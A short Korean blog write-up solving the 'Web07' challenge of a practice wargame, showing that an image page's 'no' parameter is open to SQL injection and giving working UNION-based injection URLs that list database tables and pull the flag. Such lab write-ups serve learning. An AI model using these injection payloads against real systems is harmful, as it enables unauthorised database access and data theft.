Wargame/KH Wargame

[KH Wargame] Web07 풀이

bjloed 2020. 8. 7. 02:19
풀이

flag is in the DB.

 

Blind Union SQL Injection 문제이다.

해당 문제에 들어가면 no=1 ~ 12까지 사진이 올려져있는데, no 부분에서 SQLi가 발생한다.

간단하게 ?no=1 or 1=1 해보면 나온다.

 

설명은 다른 문제에서도 많이 했으니 테이블 이름과 최종 flag를 찾는 쿼리만 올리도록 하겠다.

 

테이블 쿼리

http://wargame.iei.or.kr:30006/image.php?no=0 and 1 union select 1,table_name,3,4 from information_schema.tables limit 51,1%23

flag 쿼리

http://wargame.iei.or.kr:30006/image.php?no=0 and 1 union select 1,here,3,4 from flag%23

저작자표시 비영리 동일조건